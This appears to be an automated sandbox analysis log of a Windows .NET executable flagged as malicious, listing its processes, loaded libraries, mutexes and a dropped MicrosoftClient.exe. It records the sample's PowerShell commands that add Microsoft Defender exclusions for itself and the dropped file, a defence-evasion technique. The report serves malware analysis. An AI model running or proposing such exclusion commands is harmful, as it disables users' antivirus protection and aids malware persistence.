Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxaurn3.kw0.ps1

Jump to behavior

Source: 9RgE5uOJwX.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9RgE5uOJwX.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 9RgE5uOJwX.exe

ReversingLabs: Detection: 81%

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

File read: C:\Users\user\Desktop\9RgE5uOJwX.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9RgE5uOJwX.exe "C:\Users\user\Desktop\9RgE5uOJwX.exe"
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\MicrosoftClient.exe "C:\Users\user\AppData\Local\MicrosoftClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\MicrosoftClient.exe "C:\Users\user\AppData\Local\MicrosoftClient.exe"
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'	Jump to behavior

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 9RgE5uOJwX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9RgE5uOJwX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

